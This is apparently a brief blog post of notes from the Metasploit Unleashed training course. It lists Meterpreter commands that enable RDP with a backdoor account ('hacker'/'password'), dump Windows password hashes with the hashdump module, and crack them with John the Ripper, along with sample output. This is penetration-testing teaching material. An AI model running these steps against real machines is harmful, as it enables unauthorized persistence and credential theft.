Source Metasploit Unleashed
Enable RDP
meterpreter > run getgui -h
meterpreter > run getgui -u hacker -p password
DONE! Connect using RDP
JTR
background session
meterpreter > background
msf auxiliary(handler) > use post/windows/gather/hashdump
msf post(hashdump) > set session 1
msf post(hashdump) > run
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY bffad2dcc991597aaa19f90e8bc4ee00...
[*] Obtaining the user list and keys...
msf post(hashdump) > use auxiliary/analyze/jtr_crack_fast
msf auxiliary(jtr_crack_fast) > run
[*] Seeded the password database with 8 words...
No comments:
Post a Comment